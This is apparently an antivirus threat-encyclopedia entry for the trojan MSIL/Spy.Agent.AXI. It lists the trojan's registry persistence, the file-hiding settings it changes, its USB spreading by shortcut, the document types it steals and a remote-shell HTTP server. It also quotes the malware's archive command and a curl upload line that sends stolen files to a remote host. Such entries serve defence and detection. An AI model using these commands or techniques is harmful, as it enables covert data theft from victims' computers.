MSIL/Spy.Agent.AXI [Threat Name] go to Threat

MSIL/Spy.Agent.AXI [Threat Variant Name]

Category trojan
Size 3262976 B
Detection created Mar 14, 2017
Detection database version 15089
Aliases Trojan-Ransom.Win32.Blocker.juiv (Kaspersky)
  Trojan:Win32/Skeeyah.A!rfn (Microsoft)
  W32.Rontokbro@mm (Symantec)
  Trojan.MulDrop7.11002 (Dr.Web)
Short description

MSIL/Spy.Agent.AXI is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine.


When executed, the trojan copies itself into the following location:

  • %localappdata%\­DrvHost.exe

In order to be executed on every system start, the trojan sets the following Registry entry:

  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Run]
    • "Font Driver Host" = "%localappdata%\­DrvHost.exe"

The following Registry entries are set:

  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Explorer\­Advanced]
    • "Hidden" = 2
    • "HideFileExt" = 1
    • "ShowSuperHidden" = 0

The trojan may set the following Registry entries:

  • [HKEY_CURRENT_USER\­SOFTWARE\­Microsoft\­Windows\­CurrentVersion\­Explorer\­StartupApproved\­Run]
    • "Font Driver Host" = 02 00 00 00 00 00 00 00 00 00 00 00 00

The trojan creates the following files:

  • %currentfolder%\­curl.exe (2653184 B)
  • %currentfolder%\­7za.exe (587776 B)
Spreading on removable media

The trojan searches for files and folders in the root folders of removable drives.

The trojan moves the following files (source, destination):

  • %removabledrive%\­*, %removabledrive%\­%u00a0%\­%u00a0%\­*

The trojan copies itself to the following location:

  • %removabledrive%\­%u00a0%\­DrvHost.exe

The trojan creates the following file:

  • %removabledrive%\­(%variable% GB)%u00a0%.lnk

The file is a shortcut to a malicious file.

A string with variable content is used instead of %variable% .

Information stealing

The trojan searches for files with the following file extensions:

  • .docx
  • .doc
  • .xlsx
  • .xls
  • .pdf
  • .zip
  • .rar
  • .tgz
  • .txt
  • .sql
  • .gz
  • .tar
  • .7z

The trojan attempts to send the found files to a remote machine.

The trojan contains a URL address. The HTTP protocol is used.

Other information

The trojan opens TCP port 13337 . An HTTP server is listening there.

It can execute the following operations:

  • execute shell commands
  • send requested files
  • send the list of files on a specific drive to a remote computer

The trojan creates the following folders:

  • %localappdata%\­fontdrivertemp\­
  • %localappdata%\­DiscSoftLtd\­
  • %localappdata%\­Google\­
  • %localappdata%\­Google\­CrashReports\­

The trojan may execute the following commands:

  • explorer.exe "%removabledrive%\­%u00a0%\­%u00a0%\­"
  • 7za.exe a -t7z container_%variable%.7z ./fontdrivertemp/* -y
  • curl.exe "http://%removed%/upload.php --header "Host: %removed%" -F "file=@container_%variable%.7z" -F\­"machine=%computername%"

A string with variable content is used instead of %variable% .

Trojan requires the Microsoft .NET Framework to run.

Please enable Javascript to ensure correct displaying of this content and refresh this page.